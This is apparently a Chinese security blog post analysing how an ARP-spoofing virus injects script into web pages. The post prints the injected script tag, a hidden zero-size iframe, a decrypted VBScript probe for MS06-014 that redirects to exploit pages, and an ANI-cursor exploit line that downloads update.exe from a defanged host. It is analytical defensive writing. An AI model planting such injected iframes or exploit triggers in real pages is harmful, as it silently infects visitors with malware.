ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等

简介: ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等

ARP病毒自动加入的网址为:

/---
<script language=javascript src=hxxp://google**.17***173**8.org/ad***.js></script>
---/

ad***.js 包含代码:

/---
document.write('<iframe width=0 height=0 src="hxxp://google**.17***173**8.org/p*d***.htm"></iframe>');
---/

p*d***.htm 首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。

t 的值解密后为VBScript脚本:

/---
<script language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004EXP!"
document.write("<iframe width=""0"" height=""0"" src=""ms07017.htm""></iframe>")
else
'msgbox "存在0614漏洞,页面转到MS0614的EXP!"
document.write("<iframe width=""0"" height=""0"" src=""06014.htm""></iframe>")
end if
</script>
---/

ms07017.htm 与 p*d***.htm 相似,首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。

解密后的t值为JavaScript脚本,功能是如果cookie变量“MTV”不存在,则创建,并输出sscape()编码的代码:

/---
<script src="ani.js"></script>
---/

ani.js的内容为JavaScript脚本,包含代码:

/---
document.writeln(“<DIV style=/“CURSOR: url(hxxp:////google**.17***173**8.org//ani.jpg)/”><//DIV><//DIV><//BODY><//HTML>”);
---/

ani.jpg利用 ANI漏洞下载 update.exe


相关文章
|
2月前
|
安全 网络协议
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
|
2月前
|
安全 网络协议
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
|
网络协议 安全 网络安全
|
网络协议 安全 网络架构
|
安全 网络协议 网络安全
|
网络协议 安全 Windows
|
网络协议 安全 数据安全/隐私保护
网站源文件被注入了iframe代码—ARP欺骗的木马病毒攻击
我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了iframe嵌套框架网页,该网页执行木马程序……按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码。
1633 0